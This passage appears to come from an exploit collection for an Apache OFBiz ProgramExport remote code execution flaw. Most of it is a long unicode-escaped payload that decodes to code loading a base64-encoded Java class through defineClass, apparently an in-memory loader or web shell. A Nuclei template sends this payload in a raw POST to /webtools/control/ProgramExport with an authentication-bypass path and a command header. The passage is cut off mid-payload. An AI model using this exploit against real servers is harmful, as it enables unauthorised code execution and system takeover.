051\u0036\u0032\u0041\u0041\u0051\u0053\u004c\u0067\u0053\u0039\u0041\u0042\u0078\u005a\u0041\u0078\u006b\u0052\u0055\u0037\u0059\u0041\u0048\u0052\u006b\u004f\u0042\u004c\u0030\u0041\u0048\u006c\u006b\u0044\u0047\u0051\u006c\u0054\u0074\u0067\u0041\u0066\u0056\u0036\u0063\u0041\u0054\u007a\u006f\u0052\u004b\u0068\u0049\u0077\u0074\u0067\u0041\u0070\u004f\u0068\u0049\u005a\u0045\u0068\u0049\u0078\u0042\u004c\u0030\u0041\u0048\u0046\u006b\u0044\u0045\u0069\u0078\u0054\u0074\u0067\u0041\u0074\u0047\u0052\u0049\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u005a\u0045\u0046\u004f\u0032\u0041\u0042\u0038\u0036\u0043\u0052\u006b\u004f\u0074\u0067\u0041\u0045\u0045\u0069\u0034\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u005a\u0045\u006c\u004f\u0032\u0041\u0042\u0030\u005a\u0044\u0067\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u006b\u004a\u0055\u0037\u0059\u0041\u0048\u0031\u0065\u006e\u0041\u0041\u0036\u006e\u0041\u0041\u0055\u0036\u0043\u0049\u0051\u0047\u0041\u0061\u0066\u0039\u0070\u0037\u0045\u0041\u0042\u0077\u0043\u0067\u0041\u004b\u0073\u0041\u0072\u0067\u0041\u0053\u0041\u004d\u0034\u0041\u0033\u0041\u0044\u0066\u0041\u0042\u0049\u0042\u0078\u0041\u0049\u0077\u0041\u006a\u004d\u0041\u004c\u0077\u0041\u002f\u0041\u0045\u0051\u0043\u0068\u0051\u0041\u0076\u0041\u0045\u0063\u0041\u0059\u0067\u004b\u0046\u0041\u0043\u0038\u0041\u005a\u0051\u0043\u0046\u0041\u006f\u0055\u0041\u004c\u0077\u0043\u0049\u0041\u006e\u0038\u0043\u0068\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u004e\u0034\u0041\u004e\u0077\u0041\u0041\u0041\u0042\u0055\u0041\u0042\u0041\u0041\u0057\u0041\u0041\u0073\u0041\u0046\u0077\u0041\u0056\u0041\u0042\u0067\u0041\u0047\u0067\u0041\u005a\u0041\u0043\u0059\u0041\u0047\u0077\u0041\u002f\u0041\u0042\u0030\u0041\u0052\u0077\u0041\u0065\u0041\u0045\u0034\u0041\u0048\u0077\u0042\u006c\u0041\u0043\u0041\u0041\u0063\u0041\u0041\u0068\u0041\u0048\u0055\u0041\u0049\u0067\u0042\u0039\u0041\u0043\u004d\u0041\u0069\u0041\u004
1\u006b\u0041\u004a\u004d\u0041\u004a\u0051\u0043\u0059\u0041\u0043\u0059\u0041\u006f\u0041\u0041\u006f\u0041\u004b\u0073\u0041\u004b\u0077\u0043\u0075\u0041\u0043\u006b\u0041\u0073\u0041\u0041\u0071\u0041\u004d\u0045\u0041\u004c\u0041\u0044\u0047\u0041\u0043\u0030\u0041\u007a\u0067\u0041\u0076\u0041\u004e\u0077\u0041\u004d\u0067\u0044\u0066\u0041\u0044\u0041\u0041\u0034\u0051\u0041\u0078\u0041\u004f\u0077\u0041\u004d\u0077\u0044\u0078\u0041\u0044\u0051\u0041\u002b\u0051\u0041\u0031\u0041\u0051\u0051\u0041\u004e\u0067\u0045\u004a\u0041\u0044\u0063\u0042\u0046\u0077\u0041\u0034\u0041\u0054\u004d\u0041\u004f\u0051\u0045\u002b\u0041\u0044\u006f\u0042\u0051\u0077\u0041\u0037\u0041\u0055\u0073\u0041\u0050\u0041\u0046\u006b\u0041\u0044\u0030\u0042\u0069\u0067\u0041\u002b\u0041\u0059\u0038\u0041\u0050\u0077\u0047\u0053\u0041\u0045\u0045\u0042\u006e\u0051\u0042\u0043\u0041\u0063\u0051\u0041\u0052\u0041\u0048\u004d\u0041\u0045\u0055\u0042\u0030\u0077\u0042\u0047\u0041\u0067\u0034\u0041\u0052\u0077\u0049\u0077\u0041\u0045\u0077\u0043\u004d\u0077\u0042\u0049\u0041\u006a\u0055\u0041\u0053\u0051\u0049\u0039\u0041\u0045\u006f\u0043\u0058\u0051\u0042\u004c\u0041\u006e\u0038\u0041\u0054\u0051\u004b\u0043\u0041\u0046\u0045\u0043\u0068\u0051\u0042\u0050\u0041\u006f\u0063\u0041\u0047\u0077\u004b\u004e\u0041\u0046\u004d\u0041\u006c\u0051\u0041\u0041\u0041\u0041\u0051\u0041\u0041\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0067\u0043\u0058\u0041\u0041\u004d\u0041\u006b\u0077\u0041\u0041\u0041\u0044\u006b\u0041\u0041\u0067\u0041\u0044\u0041\u0041\u0041\u0041\u0045\u0053\u0075\u0034\u0041\u0044\u004b\u0077\u0054\u0062\u0067\u0041\u0041\u0072\u0059\u0041\u004e\u0043\u0075\u0032\u0041\u0044\u0057\u0077\u0041\u0041\u0045\u0041\u0041\u0041\u0041\u0045\u0041\u0041\u0055\u0041\u004d\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0041\u004f\u0041\u0041\u004d\u0041\u0041\u0041\u0042\u0064\u0041\u0041\u0055\u0041\u0058\u0067\u0041\u0047\u0041\u0046\u0038\u0041\u006c\u0051\u0041\u0041\
u0041\u0041\u0051\u0041\u0041\u0051\u0041\u007a\u0041\u004a\u0067\u0041\u0041\u0041\u0041\u0043\u0041\u004a\u006b\u0041\u0041\u0051\u0043\u0061\u0041\u004a\u0073\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0041\u002f\u0077\u0041\u0045\u0041\u0041\u0051\u0041\u0041\u0041\u0043\u0062\u004b\u0038\u0059\u0041\u0044\u0042\u0049\u0032\u004b\u0037\u0059\u0041\u004e\u0035\u006b\u0041\u0042\u0068\u0049\u0034\u0073\u0043\u0075\u0032\u0041\u0044\u006c\u004d\u004b\u0078\u0049\u0036\u0074\u0067\u0041\u0037\u006d\u0051\u0041\u0037\u004b\u0069\u0075\u0033\u0041\u0044\u0077\u0053\u0050\u0062\u0059\u0041\u0050\u006b\u0030\u0073\u0076\u0067\u0057\u0066\u0041\u0041\u0059\u0053\u0050\u0037\u0041\u0071\u004c\u0041\u004d\u0079\u0074\u0051\u0042\u0041\u004b\u0069\u0077\u0045\u004d\u0072\u0067\u0041\u0051\u0062\u0067\u0041\u004a\u0037\u0055\u0041\u0051\u0072\u0073\u0041\u0051\u0031\u006b\u0071\u0074\u0077\u0042\u0045\u0054\u0069\u0032\u0032\u0041\u0045\u0055\u0053\u0052\u0072\u0041\u0072\u0045\u006b\u0065\u0032\u0041\u0044\u0075\u005a\u0041\u0043\u0049\u0071\u004b\u0037\u0063\u0041\u0050\u0042\u0049\u0039\u0074\u0067\u0041\u002b\u0054\u0053\u0079\u002b\u0042\u005a\u0038\u0041\u0042\u0068\u004a\u0049\u0073\u0043\u006f\u0073\u0041\u007a\u0049\u0073\u0042\u0044\u004b\u0032\u0041\u0045\u006d\u0077\u004b\u0078\u004a\u004b\u0074\u0067\u0041\u0037\u006d\u0051\u0041\u004e\u004b\u0069\u006f\u0072\u0074\u0077\u0041\u0038\u0074\u0067\u0042\u004c\u0073\u0043\u006f\u0071\u004b\u0037\u0063\u0041\u0050\u004c\u0059\u0041\u0053\u0037\u0041\u0041\u0041\u0041\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0053\u0041\u0042\u0051\u0041\u0041\u0041\u0042\u0070\u0041\u0041\u0030\u0041\u0061\u0067\u0041\u0051\u0041\u0047\u0077\u0041\u0046\u0051\u0042\u0074\u0041\u0042\u0034\u0041\u0062\u0077\u0041\u0070\u0041\u0048\u0041\u0041\u004c\u0077\u0042\u0078\u0041\u0044\u0049\u0041\u0063\u0077\u0041\u0035\u0041\u0048\u0051\u0041\u0052\u0067\u0042\u0031\u0041\u0045\u0038\u0041\u0064\u0067\u0042\u0054\u0041\u0
048\u0063\u0041\u0056\u0067\u0042\u0034\u0041\u0046\u0038\u0041\u0065\u0051\u0042\u0071\u0041\u0048\u006f\u0041\u0063\u0041\u0042\u0037\u0041\u0048\u004d\u0041\u0066\u0051\u0042\u002b\u0041\u0048\u0034\u0041\u0068\u0077\u0042\u002f\u0041\u004a\u0045\u0041\u0067\u0051\u0041\u0042\u0041\u004a\u0077\u0041\u006e\u0051\u0041\u0042\u0041\u004a\u004d\u0041\u0041\u0041\u0042\u0032\u0041\u0041\u004d\u0041\u0042\u0051\u0041\u0041\u0041\u0044\u0061\u0037\u0041\u0045\u0078\u005a\u004b\u0037\u0063\u0041\u0054\u0055\u0036\u0037\u0041\u0045\u0035\u005a\u004c\u0062\u0063\u0041\u0054\u007a\u006f\u0045\u0047\u0051\u0051\u0073\u0075\u0041\u0042\u0051\u0074\u0067\u0042\u0052\u0047\u0051\u0053\u0032\u0041\u0046\u0049\u005a\u0042\u004c\u0059\u0041\u0055\u0036\u0063\u0041\u0043\u007a\u006f\u0045\u0047\u0051\u0053\u0032\u0041\u0046\u0053\u0077\u004c\u0062\u0059\u0041\u0056\u0062\u0041\u0041\u0041\u0051\u0041\u004a\u0041\u0043\u0059\u0041\u004b\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0043\u0059\u0041\u0043\u0051\u0041\u0041\u0041\u0049\u0077\u0041\u0043\u0051\u0043\u004f\u0041\u0042\u004d\u0041\u006a\u0077\u0041\u0063\u0041\u004a\u0041\u0041\u0049\u0051\u0043\u0052\u0041\u0043\u0059\u0041\u006c\u0041\u0041\u0070\u0041\u004a\u0049\u0041\u004b\u0077\u0043\u0054\u0041\u0044\u0045\u0041\u006c\u0051\u0041\u0043\u0041\u004a\u0034\u0041\u006d\u0077\u0041\u0042\u0041\u004a\u004d\u0041\u0041\u0041\u0041\u0076\u0041\u0041\u004d\u0041\u0041\u0067\u0041\u0041\u0041\u0042\u0063\u0072\u0045\u006a\u006f\u0053\u004e\u0072\u0059\u0041\u0056\u0068\u004a\u004b\u0045\u006a\u0061\u0032\u0041\u0046\u0059\u0053\u0052\u0078\u0049\u0032\u0074\u0067\u0042\u0057\u0073\u0041\u0041\u0041\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0041\u0059\u0041\u0041\u0051\u0041\u0041\u0041\u004a\u0034\u0041\u0041\u0051\u0043\u0066\u0041\u004a\u0073\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0042\u0078\u0077\u0041\u0045\u0041\u0041\u006b\u0041\u0041\u0041\u0045\u006e\u0045\u006c\u006
5\u0034\u0041\u0046\u0069\u0032\u0041\u0046\u006c\u004e\u004b\u0037\u0059\u0041\u004f\u0055\u0077\u0042\u0054\u0069\u0077\u0053\u0057\u0072\u0059\u0041\u0044\u004a\u006b\u0041\u0051\u0043\u0073\u0053\u0057\u0037\u0059\u0041\u0044\u004a\u006b\u0041\u0049\u0043\u0073\u0053\u0058\u004c\u0059\u0041\u0044\u004a\u006f\u0041\u0046\u0037\u0073\u0041\u0058\u0056\u006d\u0033\u0041\u0046\u0034\u0072\u0074\u0067\u0042\u0066\u0045\u006d\u0043\u0032\u0041\u0046\u002b\u0032\u0041\u0047\u0046\u004d\u0042\u0072\u0030\u0041\u0049\u0056\u006b\u0044\u0045\u0069\u004a\u0054\u0057\u0051\u0051\u0053\u0059\u006c\u004e\u005a\u0042\u0053\u0074\u0054\u004f\u0067\u0053\u006e\u0041\u0044\u0030\u0072\u0045\u006c\u0075\u0032\u0041\u0041\u0079\u005a\u0041\u0043\u0041\u0072\u0045\u006c\u0079\u0032\u0041\u0041\u0079\u0061\u0041\u0042\u0065\u0037\u0041\u0046\u0031\u005a\u0074\u0077\u0042\u0065\u004b\u0037\u0059\u0041\u0058\u0078\u004a\u006a\u0074\u0067\u0042\u0066\u0074\u0067\u0042\u0068\u0054\u0041\u0061\u0039\u0041\u0043\u0046\u005a\u0041\u0078\u004a\u006b\u0055\u0031\u006b\u0045\u0045\u006d\u0056\u0054\u0057\u0051\u0055\u0072\u0055\u007a\u006f\u0045\u0075\u0041\u0042\u006d\u0047\u0051\u0053\u0032\u0041\u0047\u0064\u004f\u0075\u0077\u0042\u006f\u0057\u0053\u0032\u0032\u0041\u0047\u006d\u0033\u0041\u0047\u006f\u0053\u0061\u0037\u0059\u0041\u0062\u0044\u006f\u0046\u0047\u0051\u0057\u0032\u0041\u0047\u0032\u005a\u0041\u0041\u0073\u005a\u0042\u0062\u0059\u0041\u0062\u0071\u0063\u0041\u0042\u0052\u0049\u0032\u004f\u0067\u0061\u0037\u0041\u0047\u0068\u005a\u004c\u0062\u0059\u0041\u0062\u0037\u0063\u0041\u0061\u0068\u004a\u0072\u0074\u0067\u0042\u0073\u004f\u0067\u0057\u0037\u0041\u0046\u0031\u005a\u0074\u0077\u0042\u0065\u0047\u0051\u0061\u0032\u0041\u0046\u0038\u005a\u0042\u0062\u0059\u0041\u0062\u005a\u006b\u0041\u0043\u0078\u006b\u0046\u0074\u0067\u0042\u0075\u0070\u0077\u0041\u0046\u0045\u006a\u0061\u0032\u0041\u0046\u002b\u0032\u0041\u0047\u0045\u0036\u0042\u0068\u006b\u0047\u004f\u0067\u0063\u0074\
u0078\u0067\u0041\u0048\u004c\u0062\u0059\u0041\u0063\u0042\u006b\u0048\u0073\u0044\u006f\u0046\u0047\u0051\u0057\u0032\u0041\u0046\u0051\u0036\u0042\u0069\u0033\u0047\u0041\u0041\u0063\u0074\u0074\u0067\u0042\u0077\u0047\u0051\u0061\u0077\u004f\u0067\u0067\u0074\u0078\u0067\u0041\u0048\u004c\u0062\u0059\u0041\u0063\u0042\u006b\u0049\u0076\u0077\u0041\u0045\u0041\u004a\u0041\u0041\u002b\u0077\u0045\u0047\u0041\u0043\u0038\u0041\u006b\u0041\u0044\u0037\u0041\u0052\u006f\u0041\u0041\u0041\u0045\u0047\u0041\u0051\u0038\u0042\u0047\u0067\u0041\u0041\u0041\u0052\u006f\u0042\u0048\u0041\u0045\u0061\u0041\u0041\u0041\u0041\u0041\u0051\u0043\u0055\u0041\u0041\u0041\u0041\u0062\u0067\u0041\u0062\u0041\u0041\u0041\u0041\u0070\u0077\u0041\u004a\u0041\u004b\u0067\u0041\u0044\u0067\u0043\u0070\u0041\u0042\u0041\u0041\u0071\u0077\u0041\u005a\u0041\u004b\u0077\u0041\u004b\u0077\u0043\u0074\u0041\u0044\u0038\u0041\u0072\u0077\u0042\u0057\u0041\u004c\u0045\u0041\u0061\u0041\u0043\u0079\u0041\u0048\u0077\u0041\u0074\u0041\u0043\u0051\u0041\u004c\u0063\u0041\u006d\u0051\u0043\u0034\u0041\u004b\u0073\u0041\u0075\u0051\u0043\u002f\u0041\u004c\u006f\u0041\u0030\u0051\u0043\u0037\u0041\u0050\u0063\u0041\u0076\u0041\u0044\u0037\u0041\u004d\u0041\u0041\u002f\u0077\u0044\u0042\u0041\u0051\u004d\u0041\u0076\u0041\u0045\u0047\u0041\u004c\u0030\u0042\u0043\u0041\u0043\u002b\u0041\u0051\u0038\u0041\u0077\u0041\u0045\u0054\u0041\u004d\u0045\u0042\u0046\u0077\u0043\u002b\u0041\u0052\u006f\u0041\u0077\u0041\u0045\u0067\u0041\u004d\u0045\u0042\u004a\u0041\u0044\u0044\u0041\u0041\u0045\u0041\u006f\u0041\u0043\u0068\u0041\u0041\u0045\u0041\u006b\u0077\u0041\u0041\u0041\u0056\u006b\u0041\u0042\u0041\u0041\u004d\u0041\u0041\u0041\u0041\u0079\u0052\u004a\u0058\u0075\u0041\u0042\u0059\u0074\u0067\u0042\u005a\u0045\u006c\u0071\u0032\u0041\u0041\u0079\u0061\u0041\u0041\u006b\u0053\u0063\u0055\u0036\u006e\u0041\u0041\u0059\u0053\u0063\u006b\u0036\u0034\u0041\u0047\u0059\u0074\u0074\u0067\u0042\u007a\u004f\u0
067\u0053\u0037\u0041\u0048\u0052\u005a\u004b\u0078\u0079\u0033\u0041\u0048\u0055\u0036\u0042\u0052\u006b\u0045\u0074\u0067\u0042\u0070\u004f\u0067\u0059\u005a\u0042\u004c\u0059\u0041\u0062\u007a\u006f\u0048\u0047\u0051\u0057\u0032\u0041\u0048\u0059\u0036\u0043\u0042\u006b\u0045\u0074\u0067\u0042\u0033\u004f\u0067\u006b\u005a\u0042\u0062\u0059\u0041\u0065\u0044\u006f\u004b\u0047\u0051\u0057\u0032\u0041\u0048\u006d\u0061\u0041\u0047\u0041\u005a\u0042\u0072\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004b\u0047\u0051\u0061\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0042\u0037\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004b\u0047\u0051\u0065\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0043\u004c\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004a\u0047\u0051\u0069\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0043\u0072\u0059\u0041\u0066\u0052\u006b\u004a\u0074\u0067\u0042\u0039\u0046\u0041\u0042\u002b\u0075\u0041\u0043\u0041\u0047\u0051\u0053\u0032\u0041\u0049\u0046\u0058\u0070\u0077\u0041\u0049\u004f\u0067\u0075\u006e\u002f\u0035\u0034\u005a\u0042\u004c\u0059\u0041\u0063\u0042\u006b\u0046\u0074\u0067\u0043\u0043\u0070\u0077\u0041\u004a\u0054\u0069\u0032\u0032\u0041\u0049\u004e\u0058\u0073\u0051\u0041\u0043\u0041\u004b\u0063\u0041\u0072\u0051\u0043\u0077\u0041\u0043\u0038\u0041\u0041\u0041\u0043\u002f\u0041\u004d\u0049\u0041\u004c\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0075\u0041\u0042\u0073\u0041\u0041\u0041\u0044\u0050\u0041\u0042\u0041\u0041\u0030\u0041\u0041\u0057\u0041\u004e\u0049\u0041\u0047\u0051\u0044\u0055\u0041\u0043\u0049\u0041\u0031\u0051\u0041\u0074\u0041\u004e\u0059\u0041\u0051\u0067\u0044\u0058\u0041\u0046\u0041\u0041\u0032\u0041\u0042\u0059\u0041\u004e\u006b\u0041\u0059\u0041\u0044\u0061\u0041\u0047\u0030\u0041\u0033\u0041\u0042\u0031\u0041\u004e\u0030\u0041\u0067\u0067\u0044\u0066\u0041\u0049\u006
f\u0041\u0034\u0041\u0043\u0058\u0041\u004f\u0049\u0041\u006e\u0041\u0044\u006a\u0041\u004b\u0045\u0041\u0035\u0041\u0043\u006e\u0041\u004f\u0059\u0041\u0072\u0051\u0044\u006e\u0041\u004c\u0041\u0041\u0036\u0041\u0043\u0079\u0041\u004f\u006b\u0041\u0074\u0051\u0044\u0072\u0041\u004c\u006f\u0041\u0037\u0041\u0043\u002f\u0041\u004f\u0038\u0041\u0077\u0067\u0044\u0074\u0041\u004d\u004d\u0041\u0037\u0067\u0044\u0049\u0041\u0050\u0041\u0041\u0041\u0051\u0043\u0069\u0041\u004a\u0049\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0041\u004c\u0041\u0041\u0044\u0041\u0041\u0045\u0041\u0041\u0041\u0041\u0051\u004b\u0069\u0071\u0030\u0041\u0045\u0041\u0071\u0074\u0041\u0042\u0043\u0074\u0067\u0043\u0045\u0074\u0067\u0043\u0046\u0073\u0051\u0041\u0041\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0041\u006f\u0041\u0041\u0067\u0041\u0041\u0041\u0050\u0051\u0041\u0044\u0077\u0044\u0031\u0041\u0041\u006b\u0041\u006f\u0077\u0043\u006b\u0041\u0041\u0045\u0041\u006b\u0077\u0041\u0041\u0041\u0052\u0077\u0041\u0042\u0067\u0041\u0045\u0041\u0041\u0041\u0041\u0072\u0041\u0046\u004d\u0045\u006f\u0061\u0034\u0041\u0044\u004a\u004e\u004c\u0042\u004b\u0048\u0042\u004c\u0030\u0041\u0048\u0046\u006b\u0044\u0045\u0069\u0046\u0054\u0074\u0067\u0041\u0064\u004c\u004c\u0059\u0041\u004b\u0067\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0079\u0070\u0054\u0074\u0067\u0041\u0066\u0077\u0041\u0041\u0073\u0077\u0041\u0041\u0073\u0054\u004b\u0063\u0041\u0042\u0045\u0030\u0072\u0078\u0077\u0042\u0044\u0045\u006f\u0069\u0034\u0041\u0044\u0049\u0053\u0069\u0051\u004f\u0039\u0041\u0042\u0079\u0032\u0041\u0042\u0030\u0042\u0041\u0037\u0030\u0041\u0048\u0072\u0059\u0041\u0048\u0030\u0030\u0073\u0074\u0067\u0041\u0045\u0045\u006f\u006f\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0030\u0073\u0042\u004c\u0030\u0041\u0048\u006c\u006b\u0044\u004b\u006c\u004f\u0032\u0041\u0042\u002f\u0041\u0041\u0043\u007a\u0041\u0041\u0043\u0078\u004d\u0070\u0077\u0041\u0045\
u0054\u0053\u0076\u0048\u0041\u0044\u0051\u0053\u0069\u0037\u0067\u0041\u004d\u006b\u0030\u0073\u0045\u006f\u006f\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0031\u004f\u004c\u0053\u0079\u0032\u0041\u0043\u006f\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u0071\u0055\u0037\u0059\u0041\u0048\u0038\u0041\u0041\u004c\u004d\u0041\u0041\u004c\u0045\u0079\u006e\u0041\u0041\u0052\u004e\u004b\u0037\u0041\u0041\u0041\u0077\u0041\u0043\u0041\u0043\u0030\u0041\u004d\u0041\u0041\u0076\u0041\u0044\u0055\u0041\u0063\u0051\u0042\u0030\u0041\u0043\u0038\u0041\u0065\u0051\u0043\u006d\u0041\u004b\u006b\u0041\u004c\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0047\u0041\u0042\u0045\u0041\u0041\u0041\u0044\u0039\u0041\u0041\u0049\u0041\u002f\u0077\u0041\u0049\u0041\u0051\u0041\u0041\u004c\u0051\u0045\u0044\u0041\u0044\u0041\u0042\u0041\u0051\u0041\u0078\u0041\u0051\u0051\u0041\u004e\u0051\u0045\u0047\u0041\u0045\u0077\u0042\u0042\u0077\u0042\u0078\u0041\u0051\u006f\u0041\u0064\u0041\u0045\u0049\u0041\u0048\u0055\u0042\u0044\u0041\u0042\u0035\u0041\u0051\u0034\u0041\u0066\u0077\u0045\u0050\u0041\u0049\u0038\u0042\u0045\u0041\u0043\u006d\u0041\u0052\u004d\u0041\u0071\u0051\u0045\u0052\u0041\u004b\u006f\u0042\u0046\u0051\u0041\u0042\u0041\u004b\u0055\u0041\u0041\u0041\u0041\u0043\u0041\u004b\u0059\u003d\u005c\u0022\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u0061\u0073\u0065\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0054\u006f\u0042\u0079\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u0029\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0022\u0029\u003b +``` + +## yaml +``` + +id: Apache-OFBiz-ProgramExport-rce + +info: + name: Apache-OFBiz-ProgramExport-rce + author: yingyu + severity: high + + 
+ +http: + - raw: + - | + POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 89852 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Cmd: echo {{randstr}} + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + Connection: close + + groovyProgram=
72\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0063\u006f\u006d\u006d\u006f\u006e\u0073\u002e\u0063\u006f\u0064\u0065\u0063\u002e\u0062\u0069\u006e\u0061\u0072\u0079\u002e\u0042\u0061\u0073\u0065\u0036\u0034\u005c\u0022\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0062\u0074\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0076\u0061\u0072\u0020\u0063\u006f\u0064\u0065\u003d\u005c\u0022\u0079\u0076\u0036\u0036\u0076\u0067\u0041\u0041\u0041\u0044\u0045\u0042\u006a\u0077\u006f\u0041\u0048\u0067\u0043\u006e\u0043\u0067\u0042\u0044\u0041\u004b\u0067\u004b\u0041\u0045\u004d\u0041\u0071\u0051\u006f\u0041\u0048\u0067\u0043\u0071\u0043\u0041\u0043\u0072\u0043\u0067\u0041\u0063\u0041\u004b\u0077\u004b\u0041\u004b\u0030\u0041\u0072\u0067\u006f\u0041\u0072\u0051\u0043\u0076\u0042\u0077\u0043\u0077\u0043\u0067\u0042\u0044\u0041\u004c\u0045\u0049\u0041\u004a\u0038\u004b\u0041\u0043\u0045\u0041\u0073\u0067\u0067\u0041\u0073\u0077\u0067\u0041\u0074\u0041\u0063\u0041\u0074\u0051\u0067\u0041\u0074\u0067\u0067\u0041\u0074\u0077\u0063\u0041\u0075\u0041\u006f\u0041\u0048\u0041\u0043\u0035\u0043\u0041\u0043\u0036\u0043\u0041\u0043\u0037\u0042\u0077\u0043\u0038\u0043\u0077\u0041\u0057\u0041\u004c\u0030\u004c\u0041\u004c\u0034\u0041\u0076\u0077\u0073\u0041\u0076\u0067\u0044\u0041
\u0043\u0041\u0044\u0042\u0043\u0041\u0044\u0043\u0042\u0077\u0044\u0044\u0043\u0067\u0041\u0063\u0041\u004d\u0051\u0048\u0041\u004d\u0055\u004b\u0041\u004d\u0059\u0041\u0078\u0077\u0067\u0041\u0079\u0041\u0063\u0041\u0079\u0051\u0067\u0041\u0079\u0067\u006f\u0041\u006a\u0041\u0044\u004c\u0043\u0067\u0041\u0068\u0041\u004d\u0077\u0049\u0041\u004d\u0030\u004a\u0041\u004d\u0034\u0041\u007a\u0077\u006f\u0041\u007a\u0067\u0044\u0051\u0043\u0041\u0044\u0052\u0043\u0067\u0043\u004d\u0041\u004e\u0049\u004b\u0041\u0042\u0077\u0041\u0030\u0077\u0067\u0041\u0031\u0041\u0063\u0041\u0031\u0051\u006f\u0041\u0048\u0041\u0044\u0057\u0043\u0041\u0044\u0058\u0042\u0077\u0044\u0059\u0043\u0041\u0044\u005a\u0043\u0041\u0044\u0061\u0043\u0067\u0041\u0063\u0041\u004e\u0073\u0048\u0041\u004e\u0077\u004b\u0041\u0045\u004d\u0041\u0033\u0051\u006f\u0041\u0033\u0067\u0044\u0053\u0043\u0041\u0044\u0066\u0043\u0067\u0041\u0068\u0041\u004f\u0041\u0049\u0041\u004f\u0045\u004b\u0041\u0043\u0045\u0041\u0034\u0067\u0067\u0041\u0034\u0077\u006f\u0041\u0049\u0051\u0044\u006b\u0043\u0067\u0043\u004d\u0041\u004f\u0055\u0049\u0041\u004f\u0059\u004b\u0041\u0043\u0045\u0041\u0035\u0077\u0067\u0041\u0036\u0041\u006b\u0041\u006a\u0041\u0044\u0070\u0043\u0067\u0044\u004f\u0041\u004f\u006f\u004a\u0041\u0049\u0077\u0041\u0036\u0077\u0063\u0041\u0037\u0041\u006f\u0041\u0051\u0077\u0044\u0074\u0043\u0067\u0042\u0044\u0041\u004f\u0034\u0049\u0041\u004b\u0041\u0049\u0041\u004f\u0038\u0049\u0041\u0050\u0041\u004b\u0041\u0049\u0077\u0041\u0038\u0051\u0067\u0041\u0038\u0067\u006f\u0041\u006a\u0041\u0044\u007a\u0042\u0077\u0044\u0030\u0043\u0067\u0042\u004d\u0041\u0050\u0055\u0048\u0041\u0050\u0059\u004b\u0041\u0045\u0034\u0041\u0039\u0077\u006f\u0041\u006a\u0041\u0044\u0034\u0043\u0067\u0042\u004f\u0041\u0050\u006b\u004b\u0041\u0045\u0034\u0041\u002b\u0067\u006f\u0041\u0054\u0067\u0044\u0037\u0043\u0067\u0041\u0076\u0041\u0050\u0077\u004b\u0041\u0045\u0077\u0041\u002f\u0051\u006f\u0041\u0049\u0051\u0044\u002b\u0043\u
